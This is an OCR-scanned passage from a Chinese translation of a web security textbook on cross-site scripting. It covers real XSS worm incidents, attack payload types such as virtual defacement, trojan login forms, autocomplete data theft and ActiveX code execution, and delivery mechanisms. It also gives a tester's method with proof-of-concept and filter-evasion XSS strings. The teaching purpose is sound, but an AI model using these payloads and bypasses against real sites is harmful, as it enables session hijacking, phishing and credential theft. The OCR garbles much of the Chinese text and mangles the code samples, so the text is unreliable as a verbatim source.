保存 型 XSS 漏 洞 ， 如 采 收 件 人 碍 看 亚 意 电子 邮件 ， 墨 客 就 可 以 执行 任意 JavaScript。 于 是 ， 墨 客 们 
问 该 CEO 发 送 了 一 份 恶意 电子 邮件 ， 攻 破 了 他 在 应 用 程序 上 的 会 话 ， 从 而 顾 得 了 和 贫 金 。 

有 关 此 次 攻击 的 详细 信息 ， 请 参阅 以 下 URL: 

http://blogs.zdnet.com/security/?p=3514 

2009 年 ，Twitter 成 为 了 两 个 XSS 里 虫 的 受害 者 ， 这 两 个 里 虫 利用 保存 型 XSS 漏 洞 在 Twitter 用 
户 间 进 行 传播 , 并 发 布 推 文 来 宣传 蠕虫 作者 的 网 站 。 人 们 还 在 Twitter 中 发 现 各 种 基于 DOM 的 XSS 
漏洞 ， 这 主要 是 因为 它 在 客户 端 大 量 使 用 类 似 于 Ajax 的 代码 所 致 。 

有 关 这 些 澳 洞 的 详细 信息 ， 请 参阅 以 下 URL: 


Www.cglsecurity.com/2009/04/two-xss-worms-slam-twitter.html 



















































































http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-andsomething.html 


12.2.2 XSS 攻 击 有 效 载 和 荷 


迄今 为 止 ， 我 们 已 经 重点 分 析 了 典型 的 XSS 攻 击 有 将 载 何 ， 如 和 蕉 获 一 名 有 党 害 者 的 会 话 令 牌 ， 
劫持 他 的 会 话 , 进而 “作为 ”受害 者 使 用 应 用 程序 , 执行 任意 操作 并 占有 该 用 户 的 账户 。 实际 上 ， 
还 有 其 他 大 量 的 攻击 有 戏 载 伍 可 通过 任何 类 型 的 XSS 汤 洞 传送 。 

1. 虚拟 置换 

这 种 攻击 需要 在 一 个 Web 应 用 程序 页 面 注入 恶意 数据 ， 从 而 回应 用 程序 用 户 传 送 误 导 性 信 
息 。 它 包括 简单 回 站 点 中 注入 HTML 标 记 ,， 或 者 使 用 脚本 ( 有 时 保存 在 外 部 服务 右上 ) 在 站 点 中 
注入 精心 设计 的 内 容 和 导航 。 这 种 攻击 被 称 为 虚拟 置换 (virtual defacement )， 因 为 攻击 者 实际 上 
并 没有 修改 保存 在 目标 Web 服 务 硕 上 的 内 容 ， 而 是 利用 应 用 程序 处 理 并 显示 用 户 提 交 的 输入 方面 
的 缺陷 实现 置换 。 

除 造成 无 天 紧要 的 损害 外 , 这 种 攻击 也 可 用 于 严重 的 犯罪 活动 中 。 一 个 专门 设计 的 置换 ， 如 
果 以 可 信 的 方式 传送 给 适当 的 接受 者 ， 可 能 会 被 新 闻 媒 体 报导 ,对 人 们 的 行为 、 股 票 价格 等 造成 
重大 影响 ， 从 而 帮助 攻击 者 从 中 获得 经 济 利 益 ， 如 网 12-6 所 示 。 
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Error - Windows Internet Explorer | ID x 
(IS 号 [3| http;l/mdsec.netierror!S/Error ,ashx?message=‘We+aret+ very+sorry, +WWe- Bing | 如 | 





Eile Edit Yew Favorites Tools Help 


次 Favorites 一 Error 








We are very sorry, we are going out of business. 


Please visit our partner site to continue shopping. 


图 12-6 一 次 利用 XSS 漏 洞 的 虚拟 置换 攻击 





2. 注入 木马 功能 
这 种 攻击 造成 的 后 有 果 远 比 虚拟 置换 严重 ， 它 在 易 受 攻击 的 应 用 程序 中 注入 实际 运行 的 功能 ， 
旨 在 欺骗 终端 用 户 执行 某 种 有 害 操作 〈 如 输入 敏感 数据 )， 随 后 将 它们 传送 给 攻击 者 。 

在 一 个 明显 的 攻击 中 , 攻击 者 注入 的 功能 回 用 户 显 示 一 个 木马 登录 表单 ,要 求 他 们 加 攻击 者 
控制 的 服务 需 提 交 他 们 上 自己 的 证 书 。 如 果 由 技巧 熟练 的 攻击 者 实施 ， we 不 允许 用 户 无 颖 登 
录 到 真正 的 应 用 程序 中 ， 确保 他 们 个 会 发 党 访问 过 程 中 的 任何 反常 情况 。 然 后 ,攻击 者 就 可 以 自 
由 使 用 受害 者 的 证 书 实现 自己 的 目的 。 这 种 类 型 的 有 效 载 位 非常 ee 问 用 户 传 
送 一 个 经 过 专门 设计 、 连 接 可 信 应 用 程序 的 URL， 并 要 求 他 们 正常 登录 以 访问 这 个 URL。 

男 一 种 明显 的 攻击 是 以 某 种 有 了 吸引 力 的 条 件 为 诱 乌 ,要 求 用 户 输 入 他 们 的 信用 卡 信息 ,例如 ， 


图 12-7 是 一 个 由 Jim Ley 设 计 的 概念 验证 攻击 , 它 利 用 了 2004 年 在 Google 中 发 现 的 一 种 反射 型 XSS 
漏洞 。 




















Google will shorly becomec a subccriplion Service, cocting $5 por ycar 
You can continue searching now for free, but this will change in the next month. 
lf you buy now, You get lifetime subscribtion and a free Ghvlail account. 


Buying now costs just $10, just enter vour details below. 


Payment Type [visa J 


Card Holder First Initial | 


Card Holder Surname | 人 Card werification Number 


Card Number | * The card verification number for your credit 
和 card is a three digit number prnted on the 
Card Yerification Number | signature panel on the back of Your credit 


You must provide the CY number ifitis present on your card. card immediately following your credit card 
account number. 
stat Date (MMYY) | 


Expiry Date (MMY 六 | 全 


CC Required Fields) 


Drive traffic to your website the Coogle Free way. 


Goodle Home - Advertisinyg Prodrams - Business Solutions - About Goodle 


B2004 Coogle 





图 12-7 ”一 次 注入 木马 功能 的 反射 型 XSS 攻 击 
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由 于 这 些 攻击 中 的 URL 指 癌 真 实 应 用 程序 的 可 信 域 名 ， 如 果 在 必要 时 使 用 有 效 的 SSL 证 书 ， 
它们 就 比 纯粹 的 钓鱼 Web 站 点 更 有 可 能 说 服 受害 者 提交 敏感 信息 ; 后 者 通常 位 于 为 一 个 域 中 ， 而 
且 只 是 克隆 目标 Web 站 点 的 内 容 。 

3. 诱 使 用 户 执 行 操作 

如 采 攻 击 痢 支持 受害 者 的 会 话 ， 那 么 他 就 可 以 “作为 ”该 用 户 使 用 应 用 程序 ， 并 代表 这 名 用 
户 执 行 任何 操作 。 但 是 , 这 种 执行 任意 操作 的 方法 并 不 总 能 达到 想 要 的 目的 。 它 要 求 攻击 者 监控 
他 们 上 自己 的 服务 右 ， 看 其 是 否 收 到 被 攻破 的 用 户 的 会 话 令 牌 ; 而 且 , 它 还 要 求 他 们 代表 每 一 名 用 
户 执 行 相关 操作 。 如 采 要 问 许 多 用 户 实 施 攻 击 ， 这 种 方法 并 不 可 行 。 而且， 它 在 应 用 程序 的 日 志 
中 留 下 相当 明显 的 痕迹 ， 用 户 在 调查 过 程 中 利用 它 可 迅速 确定 执行 未 授权 操作 的 计算 机 。 

如 果 攻 击 者 想 要 代表 每 位 被 攻破 的 用 户 执行 一 组 特殊 的 操作 , 就 可 以 采用 为 一 种 支持 会 话 的 
方法 ， 即 利用 攻击 有 效 载 傈 脚本 执行 操作 。 如 有 果 攻 击 者 想 要 执行 某 个 需要 管理 权限 的 操作 ， 如 修 
改 他 控制 的 一 个 账户 的 权限 ,这 种 方法 特别 有 用 。 由 于 用 户 众 多 , 要 支持 每 名 用 户 的 会 话 并 确定 
其 是 否 为 管理 员 ， 可 能 需要 付出 极 大 的 努力 。 一 种 更 加 有 效 的 方法 是 , 诱 使 每 个 被 攻破 的 用 户 学 
试 升级 攻击 者 账户 的 权限 。 大 多 数 尝试 都 会 失败 , 但 如 采 一 个 管理 用 户 被 攻破 ,攻击 者 就 能 够 成 
功 提 升 他 的 权限 。 我 们 将 在 13.1.1 方 说 明 各 种 诱 使 其 他 用 户 执行 操作 的 方法 。 

前 面 描 述 的 MySpace XSS 蠕 虫 就 是 这 种 攻击 有 效 载 傈 的 一 个 典型 示例 ; 同时 ， 它 说 明 这 种 攻 
击 者 可 以 喀 不 费力 就 代表 大 量 用 户 执 行 未 授权 操作 的 严重 性 。 这 种 攻击 利用 一 系列 采用 Ajax 技 术 
的 复杂 请 求 〈《 如 第 3 章 所 述 ) 来 执行 传播 蠕虫 所 需 的 各 种 操作 。 

如 果 攻 击 者 的 主要 目标 为 应 用 程序 , 并 且 和 希望 在 攻击 时 尽 可 能 地 保持 隐秘 , 他 就 可 以 利用 这 
种 类 型 的 XSS 攻 击 有 效 载 倚 让 其 他 用 户 执行 他 选择 的 、 针 对 应 用 程序 的 恶意 操作 。 人 例如， 攻击 者 
可 以 促使 其 他 用 户 利用 一 个 SQL 注 入 汤 洞 在 数据 库 的 用 户 账户 表 中 添加 一 个 新 的 管理 员 用 户 。 然 
后 ,攻击 痢 就 可 以 控制 这 个 新 账户 ,通过 它 执 行 恶意 操 作 ; 但 是 ,任何 对 应 用 程序 日 志 的 调查 结 
论 却 将 怀疑 对 象 指 问 这 名 新 建 的 用 户 。 

4. 利用 信任 关系 

上 文 已 经 介绍 了 可 被 XSS 利 用 的 一 种 重要 的 信任 关系 : 训 览 名 信 任 由 发 布 cookie 的 Web 站 所 
提交 的 JavaScript。 有 时 ， 在 XSS 攻 击 中 还 可 以 利用 其 他 一 些 信 任 关 系 。 

口 如 果 应 用 程序 采用 激活 目 动 完成 功能 的 表单 ， 由 应 用 程序 提交 的 JavaScript 就 可 以 稚 获 任 
何以 前 输入 的 、 用 户 浏 览 帮 保存 在 目 动 完成 缓存 中 的 数据 。 通 过 示例 化 相关 表单 ， 等 得 
浏览 痊 目 劲 完成 它 的 内 容 ， 然 后 查询 表单 字段 但 ， 上 述 JavaScript 脚 本 就 能 够 锣 取 这 些 数 
据 并 将 其 传送 至 攻击 者 的 服务 硕 。 这 种 攻击 比 注 入 木马 功能 更 加 强大 ， 因 为 它 不 需要 用 
户 执 行 任何 操作 就 可 以 截获 敏感 数据 。 

口 一 些 Web 应 用 程序 推荐 或 要 求 用户 把 其 域名 添加 到 浏览 副 的 “可 信 站 点 ”区 域内 。 这 种 要 
求 几乎 总 会 造成 不 利 影 响 , 并 意味 着 攻击 者 可 以 利用 任何 XSS 类 型 的 漏洞 在 受害 用 户 的 计 
算 机 上 执行 任意 代码 。 例如， 如 果 一 个 站 点 在 Internet Explorer 的 可 信 站 点 区 域内 运行 , 那 
么 注入 以 下 代码 将 会 在 用 户 的 计算 机 上 局 动 Windows 计 算 需 程序 。 
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<SCript> 
Var oO = new ActiveXObject('WScript.shell'):; 
oO.RuUun{('calc.exe'): 

</Script> 


口 Web 应 用 程序 通常 采用 包含 强大 方法 的 ActiveX 控 件 (请 参阅 第 13 芋 ) 一 些 应 用 程序 在 该 
控件 内 核实 调用 的 Web 页 面 确实 属于 正确 的 Web 站 点 ,力求 防止 第 三 方 滥用 这 种 控件 。 在 
这 种 情况 下 , 通过 XSS 攻 击 仍然 可 以 滥用 这 个 控件 , 因为 这 时 调用 的 代码 可 以 通过 控件 实 
施 信 任 检 查 。 





© 错误 观点 “钓鱼 与 XSS 攻 击 只 会 影响 公众 因特网 上 的 应 用 程序 。” 
XSS 漏 洞 可 以 影响 任何 类 型 的 Web 应 用 程序 ;通过 一 封 群发 电子 邮件 传送 的 针对 内 
联网 应 用 程序 的 攻击 可 以 利用 两 种 形式 的 信任 关系 。 首 先 ， 在 同事 之 间 传 送 的 内 部 电 


子 邮 件 利 用 他 们 之 间 的 社交 信任 关系 。 其 次 ， 与 公众 因特网 上 的 Web 服 务 器 相 比 ， 受 
害 者 的 浏览 器 往往 会 更 加 信任 企业 Web 服 务 器 。 人 例如， 如 果 一 台 计 算 机 属于 企业 域 的 
一 部 分 ， 那 么 在 访问 内 联网 应 用 程序 时 ， 浏 览 器 会 默认 使 用 较 低 的 安全 级 别 。 





5. 扩大 客户 端 攻击 范围 

攻击 者 可 以 采用 各 种 方式 直接 攻击 访问 一 个 Web 站 点 的 用 户 。 所 有 这 些 攻击 都 可 以 通过 易 受 
攻击 的 应 用 程序 中 的 一 个 跨 站 点 脚本 源 洞 传送 ， 当然, 用 户 偶然 访问 的 任何 恶意 站 点 也 可 以 二 接 
传送 它们 。 我 们 会 在 第 13 章 的 最 后 详细 介绍 这 种 类 型 的 攻击 。 


12.2.3 XSS 攻 击 的 传送 机 制 


确定 一 个 XSS 漏 洞 并 设计 出 利用 它 的 适当 有 歼 载 向 后 , 攻击 者 需要 找 出 办 法 回应 用 程序 的 其 
他 用 户 传 送 攻击 。 我 们 在 前 面 已 经 讨论 了 几 种 传送 方法 。 实 际 上 , 攻击 者 还 可 以 使 用 其 他 许多 传 
送 机 制 。 

1. 传送 反射 型 与 基于 DOM 的 XSS 攻 击 

除了 通过 电子 邮件 回 随 机 用 户 大 量 发 送 专门 设计 的 URL 这 种 明显 的 钓鱼 向量 外 , 攻击 者 还 可 
以 冬 试 使 用 以 下 机 制 传送 反射 型 或 基于 DOM 的 XSS 攻 击 。 

口 在 有 人 针对 性 的 攻击 中 ， 攻 击 者 可 以 癌 个 体 目 标 用 户 或 少数 几 名 用 户 发 送 一 封 伪造 的 电子 
邮件 。 例 如 ， 可 以 向 管理 员 发 送 一 封 明 显 由 已 知 用 户 送出 的 电子 邮件 ， 抱 怨 某 个 特殊 的 
URL 造 成 错误 。 如 果 攻 击 者 想 要 攻破 某 个 特殊 用 户 的 会 话 〈 而 非 截 取 随 机 用 户 的 会 话 )， 
实施 合理 、 可 靠 的 针对 性 攻击 往往 是 最 有 效 的 传送 机 制 。 有 时 我 们 也 把 这 类 攻击 称 为 “ 鱼 
又 式 钓鱼 ”。 

口 可 以 在 即时 消息 中 辐 目 标 用 户 提 供 一 个 URL。 

口 第 三 方 Web 站 点 上 的 内 容 与 代码 可 用 于 生成 触发 XSS 汤 洞 的 请 求 。 各 种 常见 的 应 用 程序 允 
许 用 户 发 布 数量 有 限 的 HTML 标记 ， 这 些 标记 将 按 原样 癌 其 他 用 户 显示 。 如 果 可 以 使 用 
GET 方 法 触发 XSS 漏 洞 ， 攻 击 者 就 可 以 在 第 三 方 站 点 上 发 布 一 个 指向 某 恶意 UREL 的 IMG 标 
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签 ， 任 何 查 看 以 上 第 三 方 内 容 的 用 户 将 在 不 知情 的 情况 下 请 求 该 恶意 URL。 

或 者 , 攻击 者 可 以 创建 自己 的 Web 站 点 , 在 其 中 包含 诱 使 用 户 访 问 的 有 趣 内 容 , 但 也 
可 能 含有 一 些 脚本 ,时 致 用 户 的 浏览 各 问 易 受 攻击 的 应 用 程序 提出 包含 XSS 有 效 载 答 的 请 
求 。 如 果 某 用 户 登 录 以 上 易 受 攻击 的 应 用 程序 ， 并 且 磁 巧 浏览 了 攻击 者 的 站 点 ,该 用 户 
访问 以 上 易 受 攻击 的 应 用 程序 的 会 话 将 被 攻 破 。 

建立 适当 的 Web 站 点 后 ， 攻 击 者 可 以 使 用 搜索 引擎 操纵 技巧 生成 某 些 用 户 提交 的 访 
问 ， 例 如 ， 将 相关 关键 字 放 人 站 点 内 容 中 并 使 用 相关 表达 式 将 其 链接 到 相关 站 点 。 但 是 ， 
这 种 传送 机 制 与 钓鱼 攻击 无 天 ， 因 为 攻击 者 的 站 点 并 未 试图 模仿 它 所 针对 的 站 点 。 

注意 , 这 种 传送 机 制 使 得 攻击 者 可 利用 只 通过 PosT 请 求 触 发 的 反射 型 与 基于 DOM 的 
XSS 漏 洞 。 但 是 ， 利 用 这 些 漏洞 ， 攻 击 者 明显 不 能 通过 回 受 害 用 户 发 送 一 个 简单 的 URL 
来 传送 一 次 攻击 。 然 而 ， 某 个 恶意 Web 站 点 可 能 包含 一 个 HTML 表 单 ， 它 使 用 PosT 方 法 
并 以 易 受 攻击 的 应 用 程序 作为 它 的 日 标 URL。 其 页 面 上 的 JavaScript 或 导航 控件 可 用 于 提 
区 表单 ， 成 功利 用 漏洞 。 

口 在 另 一 种 利用 第 三 方 Web 站 点 的 攻击 中 ,一些 攻击 者 付费 购买 许多 链接 至 一 个 URL 的 横幅 
广告 , 该 URL 中 包含 一 个 针对 某 易 受 攻 击 的 应 用 程序 的 XSS 有 效 载 何 。 如 采 一 名 用 户 登 录 
这 个 易 受 攻击 的 应 用 程序 ， 并 单 击 广告 ， 那 么 他 登录 该 应 用 程序 的 会 话 就 会 被 攻破 。 
为 许多 提供 商 使 用 关键 字 将 广告 分 配给 与 其 有 关 的 页 面 ， 有 时 就 会 出 现 这 样 的 情况 : 一 
个 攻击 特定 应 用 程序 的 广告 恰巧 被 分 配 在 这 个 应 用 程序 的 页 面 中 。 这 不 仅 提 高 了 攻击 的 
可 信 性 ， 而 且 还 可 以 确保 在 攻击 者 实施 攻击 时 ， 单 击 广告 的 用 户 正 在 使 用 那个 易 受 攻击 
的 应 用 程序 。 此 外 ,由 于 目标 URL 现 在 为 “本 站 点 ”URL， 该 攻击 能 够 避 开 用 于 防范 XSS 
的 基于 浏览 器 的 机 制 〈 将 在 本 章 后 面部 分 详细 介绍 )。 另 外 ， 由 于 许多 横幅 广告 提供 商 按 
点 击 率 收 费 ， 这 种 技巧 使 得 攻击 者 能 够 “ 买 进 ”大 量 用 户 会 话 。 

口 许多 应 用 程序 执行 一 种 “推荐 给 朋友 ”或 回 站 点 管理 员 发 送 反 馈 的 功能 。 这 种 功能 通 沼 
允许 用 户 生 成 一 封 电 子 邮件 ， 其 内 容 与 收 件 人 均 可 目 由 设置 。 攻 击 者 能 够 利用 这 种 功能 ， 
通过 一 封 实际 源 目 目 己 服务 融 的 电子 邮件 传送 XSS 攻 击 , 提高 邮件 被 搁 术 训练 的 用 户 与 反 
恶意 软件 的 软件 接受 的 可 能 性 。 

2. 传送 保存 型 XSS 攻 击 

保存 型 XSS 攻 击 共有 两 种 传送 机 制 : 带 内 与 带 外 传送 机 制 。 

审 内 传送 机 制 适 用 于 大 多 数 情况 ， 这 时 漏洞 数据 通过 主 Web 界 面 提 交 给 应 用 程序 。 用 户 控制 

的 数据 最 终 显 示 给 其 他 用 户 的 第 见 位 置 包含 : 

口 个 人 信息 字段 ， 如 姓名 、 地 址 、 电 子 邮件 、 电 话 等 ; 

口 文档 、 上 传 文件 及 其 他 数据 的 名 称 ; 

口 提交 给 应 用 程序 管理 员 的 反馈 或 问题 ; 

口 问 其 他 应 用 程序 用 户 传送 的 消息 、 注 释 、 问 题 等 ; 

口 记录 在 应 用 程序 日 志 中 , 并 通过 浏览 器 显示 给 管理 员 的 任何 内 容 , 如 URL 用 户 名 、HTTP 
Referer. User-Agent 等 ; 
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D 在 用 户 之 间 共 享 的 上 传 文件 内 容 。 42 
在 这 些 情 况 下 ， 只 需 向 应 用 程序 页 面 提 交 XSS 有 效 载荷 ， 然 后 等 待 受害 者 查看 恶意 代码 ， 就 








待 ; 
可 以 传送 XSS 有 效 载 荷 。 

带 外 传送 机 制 适用 于 通过 其 他 渠道 回 应 用 程序 提交 漏洞 数据 的 情况 ,应 用 程序 通过 这 种 渠道 
接收 数据 ， 并 最 终 在 主 Web 界 面 生 成 的 HTML 页 面 中 显示 它 。 前 面 描述 的 针对 Web 邮 件 应 用 程序 
的 攻击 就 是 这 种 传送 机 制 的 典型 示例 。 这 种 攻击 回 一 个 SMTP 服务 器 传送 恶意 数据 ,并 最 终 在 一 
条 HTML 格 式 的 电子 邮件 消息 中 辐 用 户 显 示 这 些 数 据 。 

3. 链接 XSS 与 其 他 攻击 

XSS 漏 洞 有 时 可 与 其 他 漏洞 链接 在 一 起 ， 造 成 破坏 性 的 后 果 。 笔 者 曾 遇 到 一 个 应 用 程序 ， 它 
的 用 户 昵 称 中 存在 一 个 保存 型 XSS 漏 洞 。 这 个 数据 的 唯一 用 途 是 在 用 户 登录 后 显示 一 条 个 性 化 欢 
迎 消 息 。 该 昵称 从 不 向 其 他 应 用 程序 用 户 显示 ,因此 ,最初 似 乎 没有 任何 攻击 向 量 会 致使 用 户 在 
编辑 昵称 时 造成 问题 。 在 其 他 各 点 都 相同 的 情况 下 ， 这 种 漏洞 属于 风险 极 低 的 漏洞 。 

但 是 ， 该 应 用 程序 还 存在 另 一 个 漏洞 。 由 于 访问 控制 存在 缺陷 , 任何 用 户 都 可 以 编辑 其 他 用 
户 的 昵称 。 同 样 ， 这 个 问题 本 身 并 不 严重 。 有 哪个 攻击 者 会 对 修改 其 他 用 户 的 昵称 感 兴趣 呢 ? 

然而 ， 如 果 将 这 两 个 低 风 险 的 漏洞 链接 在 一 起 ,攻击 者 就 可 以 完全 控制 应 用 程序 。 首 先 ， 攻 
击 者 只 需 设 计 一 个 自动 攻击 , 在 每 个 应 用 程序 用 户 的 昵称 中 注入 一 段 脚 本 。 每 次 用 户 登 录 应 用 程 
序 ， 这 上 段 脚 本 就 会 执行 ,并 将 该 用 户 的 会 话 令 牌 传送 到 攻击 者 控制 的 服务 硕 中 。 应 用 程序 的 一 些 
用 户 为 管理 员 , 他 们 经 常 登录 ,能够 创建 新 用 户 并 修改 其 他 用 户 的 权限 。 攻 击 者 只 需 等 待 一 名 管 
理 员 登录 , 劫持 管理 员 的 会 话 ， 然 后 升级 自己 的 账户 ， 获 得 管理 权限 。 因 此 ,这 两 个 漏洞 同时 出 
现 会 给 应 用 程序 的 安全 造成 极 大 的 风险 。 

在 另 一 个 示例 中 , 仪 辐 提交 它们 的 用 户 显 示 的 数据 可 以 通过 跨 站 请 求 伪造 攻击 ( 请 参阅 第 13 
章 了 解 详细 信息 ) 进行 更 新 。 同 时 ， 应 用 程序 中 还 包含 保存 型 XSS 漏 洞 。 同 样 ， 如 果 单 独 出 现 ， 
这 两 个 漏洞 的 风险 相对 较 低 。 但 是 ,如 采 被 攻击 者 结合 在 一 起 加 以 利用 , 它们 就 可 能 会 造成 严重 
的 影响 。 




























































































© 错误 观点 “我 们 不 必 担 心 低 风险 XSS 漏 洞 ; 用 户 只 能 利用 它 攻 击 他 们 自己 。” 
如 上 所 述 ， 在 适当 的 情况 下 ， 即 使 是 明显 低 风 险 的 涯 洞 ， 也 会 为 更 具 破 坏 性 的 攻 
击 打 下 基础 。 实 施 深层 安全 防御 必须 删除 每 一 个 已 知 的 漏洞 ， 无 论 它 多 么 无 关 紧 要 。 


笔者 就 曾 利 用 XSS 在 页 面 响应 中 播 入 文件 浏览 器 对 话 框 或 AcitveX 探 件 ， 侵 入 与 目标 
Web 应 用 程序 绑 定 在 一 起 的 Kiosk 模 式 系统 。 在 想 出 办 法 利用 细微 漏洞 方面 ， 渗 透 测 试 
员 应 该 始终 假定 攻击 者 比 自己 更 富有 想象 力 。 
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确定 XSS 源 洞 的 基本 方法 是 使 用 下 面 这 个 概念 验证 攻击 字符 串 : 
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"><script>alert (daocument .cookie)</script> 
这 个 字符 串 被 提交 给 每 个 应 用 程序 页 面 中 的 每 一 个 参数 ; 同时 ,攻击 者 监控 它 的 啊 应 ,看 其 
中 是 否 出 现 相 同 的 字符 串 。 如 采 发 现 攻 击 字符 串 按 原样 出 现在 啊 应 中 , 几乎 可 以 肯定 应 用 程序 存 
在 XSS 漏 洞 。 
如 末 仅 仅 是 为 了 尽 可 能 快 地 确定 应 用 程序 中 存在 的 某 种 XSS 漏 洞 , 以 回 其 他 应 用 程序 用 户 实 
施 攻 击 , 那么 这 个 基本 方法 可 能 是 最 为 有 效 的 方法 ,因为 它 可 以 实现 高 度 目 动 化 ,而 且 很 少 生 成 
错误 守 报 。 但 是 ， 如 雪 居 对 应 用 程 邦 进行 受 杂 的 测试 ， 从 而 确定 尽 可 能 多 的 疾 洞 ,那么 在 应 用 基 
本 方法 的 同时 , 还 需要 组 合 使 用 更 加 复杂 的 技巧 。 在 以 下 儿 种 情况 下 , 通过 基本 的 检测 方法 可 能 
无 法 确定 应 用 程序 中 存在 的 XSS 漏 洞 。 
口 许多 应 用 程序 实施 基于 黑 名 单 的 初步 过 滤 , 试图 阻止 XSS 攻 击 。 通常 ， 这 些 过 滤 在 请 求 参 
数 中 寻找 <script> 之 类 的 表达 式 ， 并 采取 一 些 防御 措施 ， 如 删除 或 编码 表达 式 ， 或 者 完 
全 阻止 这 类 请 求 。 基 本 检测 方法 中 常用 的 攻击 学 符 串 往往 被 这 些 过 滤 阻 止 。 但 是 ， 仪 仪 
因为 一 个 稼 见 的 攻击 字符 串 被 阻止 ， 并 不 能 证 明 一 个 可 利用 的 户 洞 不 存在 。 如 后 文 所 述 ， 
在 有 些 情况 下 ， 不 使 用 <script> 标 签 ， 甚 至 不 使 用 "< > 和 /这 些 常 被 过 滤 掉 的 字符 ， 也 
可 以 利用 XSS 漏 洞 。 
口 许多 应 用 程序 实施 的 防 XSS 过 滤 存 在 缺陷 ,可 以 通过 各 种 方法 避 开 。 例如, 假设 在 处 理 用 
户 输入 前 ， 应 用 程序 删除 其 中 出 现 的 所 有 <script> 标 签 。 这 意味 着 基本 方法 中 使 用 的 攻 
击 字 符 串 将 不 会 在 应 用 程序 的 啊 应 中 返回 。 但 是 ， 以 下 一 个 或 几 个 字符 串 可 轻 匈 避 开 过 
滤 ， 成 功利 用 XSS 漏 洞 : 


"><SCript >alert (document .cookie}</script > 




















































































































"><ScR1iPt>alert (document .cookie})</ScRiPt> 
"S33esS3cscript%S3ealert (document .cookie}®3c/script$%S3e 
"><Scr<script>ipt>alert (document.cookie)</scr</script>ipt> 


%00"><script>alert (document .cookie)</script> 





尝试 访问 
http://mdsec.net/search/28/ 


http://mdsec.net/search/36/ 
http://mdsec.net/search/21/ 


注意 ,在 这 些 情况 下 ， 在 服务 器 的 响应 中 ， 笨 入 的 字 符 串 返回 前 ， 可 能 经 过 净化 、 编 码 或 其 
他 形式 的 修改 ， 因 而 还 不 足以 实现 对 XSS 漏 洞 的 利用 。 这 时 ， 提 交 :个 特殊 字 符 串 并 检查 它 是 否 
在 服务 器 的 响应 中 出 现 的 基本 检测 方法 将 无 法 成 功 发 现 漏洞 。 

当 利用 基于 DOM 的 XSS 漏 洞 时 , 攻击 有 歼 载 向 并 不 在 服务 需 的 啊 应 中 返回 , 而 是 保存 在 浏览 
天 DOM 中 ， 并 可 被 客户 端 JavaScript 访 问 。 同 样 ， 在 这 种 情况 下 ， 提 交 一 个 特殊 字符 串 并 检查 它 
是 否 在 服务 融 的 啊 应 中 出 现 的 基本 检测 方法 将 无 法 成 功 发 现 漏洞 。 
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12.3.1 查找 并 利用 反射 型 XSS 漏 洞 


要 探查 反射 型 XSS 漏 洞 ， 最 可 靠 的 方法 是 系统 性 地 检查 在 解析 应 用 程序 〈 请 参阅 第 4 音 ) 过 
程 中 确定 的 所 有 用 户 输入 进入 点 ， 并 遵循 以 下 步骤 。 

口 在 每 个 进入 点 提交 一 个 恨 性 字母 字符 串 。 

口 确定 此 字符 串 “ 反 射 ” 在 应 用 程序 啊 应 中 的 所 有 位 置 。 

口 对 于 每 个 反射 ， 确 定 显示 反射 型 数据 时 的 语法 上 下 文 。 

口 提交 针对 反射 的 语法 上 下 文 而 修改 的 数据 ， 尝 试 在 响应 中 引入 任意 脚本 。 

口 如 果 反 射 型 数据 被 阻止 或 净化 ， 导 致 脚 本 无 法 执行 ， 则 尝试 了 解 并 避 开 应 用 程序 的 防御 

性 过 滤 。 
1. 确认 用 户 输 入 的 反射 
检测 反射 型 XSS 漏 洞 的 最 可 靠 方法 的 初始 步骤 与 前 面 摘 述 的 基本 方法 类 似 。 















































渗透 测试 步骤 
(1) 选择 任意 一 个 字符 串 ， 该 字符 串 不 曾 出 现在 应 用 程序 的 任何 地 方 ， 而 且 其 中 仅 包 含 字 





母 字 符 ， 因 此 不 可 能 受到 针对 XSS 过 滤 的 影响 。 例 如 : 

myxsstestdmdlwp 

提交 这 个 字符 串 ， 以 其 作为 每 个 页 面 的 每 一 个 参数 ， 且 每 次 只 针对 一 个 参数 。 

(2) 监控 应 用 程序 的 啊 应 ， 看 其 中 是 否 出 现 同一 个 字符 串 。 记 下 参数 值 被 复制 到 应 用 程序 
啊 应 中 的 每 一 个 参数 。 这 些 参 数 不 一 定 容易 受到 攻击 , 但 需要 对 它们 进行 深入 分 析 ， 其 过 程 将 
在 后 文中 描述 。 

(3) 注意 ， 必 须 测 试 所 有 GET 与 PosT 请 求 ， 检 查 URL 查 询 字 符 串 与 消息 主体 中 的 每 一 个 参 
数 。 虽 然 有 少数 XSS 漏 洞 传送 机 制 只 能 通过 一 个 PosT 请 求 触 发 ， 但 仍 有 可 能 对 漏洞 加 以 利用 ， 
如 前 文 所 述 。 

(4) 任何 时 候 ， 一 旦 在 PosT 请 求 中 发 现 XSS， 应 使 用 Burp 中 的 “更 改 请 求 方法 ”( change 
request method ) 选项 确定 是 否 可 以 通过 cET 请 求实 施 相 同 的 攻击 。 

(5) 除 标准 的 请 求 参 数 外 ， 还 应 该 检测 HTTP 请 求 消 息 头 内 容 被 应 用 程序 处 理 的 每 一 种 情 
况 。 有 一 种 稼 见 的 XSS 漏 洞 出 现在 错误 消息 中 ， 这 时 Referezr 与 User-Agent 消 息 头 之 类 的 数 
据 项 被 复制 到 消息 的 内 容 中 。 这 些 消息 头 是 传送 反射 型 XSS 攻 击 的 有 效 工具 ， 因 为 攻击 者 可 以 
使 用 一 个 Flash 对 象 诱 使 受害 者 提出 一 个 包含 任意 HTTP 消息 头 的 请 求 。 











2. 测试 引入 脚本 的 反射 

渗透 测试 员 必 须 手 动 检查 已 确定 的 每 一 个 反射 型 输入 实例 , 以 核实 其 是 否 确实 可 和 被 利用 。 在 
啊 应 中 包含 反映 型 数据 的 每 个 位 置 ， 都 需要 确认 该 数据 的 语法 特点 。 这 时 ,渗透 测试 员 必 须 找到 
菏 种 修改 输入 的 方法 , 以便 在 将 输入 复制 到 应 用 程序 啊 应 中 的 相同 位 置 时 , 任何 脚本 都 能 够 得 以 
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执行 。 下 面 分 析 这 方面 的 一 些 示 例 。 

e100UDUUD 

假设 返回 的 页 面 中 包含 以 下 脚本 : 

<input type="text" name="address1l" value="myxsstestdmqlwp"> 

很 明显 ， 利 用 XSS 的 一 种 方法 是 终止 包含 字符 串 的 双 引 号 ， 结束 <input> 标 签 ， 然后 通过 其 
他 方法 引入 JavaScript 脚 本 ( 使 用 <script> 等 )。 例 如 : 

"><script>alert (1)</script> 

